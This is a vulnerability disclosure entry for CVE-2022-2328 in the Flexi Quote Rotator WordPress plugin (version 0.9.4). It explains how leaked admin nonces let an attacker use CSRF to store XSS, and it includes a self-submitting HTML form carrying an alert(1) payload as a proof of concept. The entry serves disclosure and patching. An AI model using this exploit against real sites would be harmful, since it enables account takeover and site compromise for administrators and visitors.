CVE: CVE-2022-2328

Name: Flexi Quote Rotator (flexi-quote-rotator)

Version: 0.9.4

Date: 2022-04-17 18:54:38

Advisory: https://wpscan.com/vulnerability/dbac391b-fc48-4e5e-b63a-2b3ddb0d5552

Type: Stored XSS

Exploit: 


Leaked nonces for example in delete links (which end in the browser history) like https://example.com/wp-admin/edit.php?page=flexi-quote-rotator.php&action=delete-quote&id=2&_wpnonce=087aa96cbb can be used for CSRF and leads to Stored XSS.
Probably same for other URLs, since the standard _wpnonce name is used.

<form action="https://example.com/wp-admin/tools.php?page=flexi-quote-rotator.php" method="POST">
    <input type="text" name="_wpnonce" value="087aa96cbb">
    <input type="text" name="quote" value="<img src=x onerror=alert(1)>">
    <input type="text" name="author" value="test">
    <input type="text" name="editQuote" value="1">
    <input type="text" name="id" value="2">
</form>
<script>
    document.forms[0].submit();
</script>